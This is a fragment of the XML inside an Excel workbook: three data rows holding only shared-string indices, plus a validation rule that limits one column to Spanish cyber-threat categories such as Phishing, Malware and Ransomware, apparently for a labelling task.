    <row r="351" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A351" s="2" t="s">
        <v>921</v>
      </c>
      <c r="B351" s="2" t="s">
        <v>922</v>
      </c>
      <c r="C351" s="2" t="s">
        <v>923</v>
      </c>
      <c r="D351" s="2" t="s">
        <v>13</v>
      </c>
      <c r="E351" s="3" t="s">
        <v>928</v>
      </c>
      <c r="F351" s="2"/>
    </row>
    <row r="352" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A352" s="2" t="s">
        <v>924</v>
      </c>
      <c r="B352" s="2" t="s">
        <v>925</v>
      </c>
      <c r="C352" s="2" t="s">
        <v>16</v>
      </c>
      <c r="D352" s="2" t="s">
        <v>13</v>
      </c>
      <c r="E352" s="3" t="s">
        <v>928</v>
      </c>
      <c r="F352" s="2"/>
    </row>
    <row r="353" spans="1:6" ht="60" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A353" s="2" t="s">
        <v>926</v>
      </c>
      <c r="B353" s="2" t="s">
        <v>927</v>
      </c>
      <c r="C353" s="2" t="s">
        <v>16</v>
      </c>
      <c r="D353" s="2" t="s">
        <v>17</v>
      </c>
      <c r="E353" s="3" t="s">
        <v>931</v>
      </c>
      <c r="F353" s="2"/>
    </row>
  </sheetData>
  <autoFilter ref="A1:F353" xr:uid="{00000000-0009-0000-0000-000000000000}"/>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" errorTitle="Categoria no valida" error="Elegir una de las 10 categorias de la guia." sqref="E2:E353" xr:uid="{00000000-0002-0000-0000-000000000000}">
      <formula1>"No relevante,Phishing,Robo de Credenciales,Malware,Ransomware,Vulnerabilidades,Filtración de Datos,Infraestructura y Ataques,Hacktivismo,Ingeniería Social"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Etiquetado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Enzo Severino</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-20T21:16:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-23T03:06:01Z</dcterms:modified>
</cp:coreProperties>
</file>